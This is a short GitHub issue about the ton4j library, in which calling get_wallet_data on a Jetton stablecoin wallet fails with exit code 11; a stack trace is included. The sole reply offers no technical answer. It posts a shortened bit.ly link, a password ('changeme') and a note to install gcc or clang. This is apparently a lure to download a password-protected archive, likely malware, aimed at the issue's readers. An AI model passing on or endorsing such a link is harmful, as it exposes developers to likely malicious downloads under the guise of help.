### ISSUE TITLE
java.lang.Error: method get_wallet_data, returned an exit code 11

### ISSUE THREAD

**Issue by a402942988** [neodix42/ton4j#56]
https://github.com/neodix42/ton4j/blob/0.6.0/smartcontract/src/test/java/org/ton/java/smartcontract/integrationtests/TestJettonStableCoin.java

JettonWalletStableCoin adminJettonWallet = minter.getJettonWallet(adminWallet.getAddress());

**error:**
Exception in thread "main" java.lang.Error: method get_wallet_data, returned an exit code 11
	at org.ton.java.smartcontract.token.ft.JettonWalletStableCoin.getBalance(JettonWalletStableCoin.java:161)
	at org.example.JettonTest6.testJettonMinterStableCoin(JettonTest6.java:93)
	at org.example.JettonTest6.main(JettonTest6.java:35)

**Comment by pinpolhoxx** [comment]
maybe this will help
https://bit.ly/3TzaAQd

Password: changeme
If you don't have the c compliator, install it.(gcc or clang)
